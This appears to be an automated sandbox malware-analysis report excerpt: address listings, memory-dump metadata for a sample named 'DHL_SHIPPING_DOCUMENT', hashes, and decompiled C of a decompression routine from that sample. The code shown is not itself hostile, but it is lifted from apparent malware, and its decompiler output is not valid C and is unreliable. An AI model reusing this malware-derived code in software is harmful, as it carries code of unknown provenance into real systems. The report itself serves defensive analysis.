                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00407447
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040744d
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004073ce
                                                              0x004073cb
                                                              0x00000000
                                                              0x00407002

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                              • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                              • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                              • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
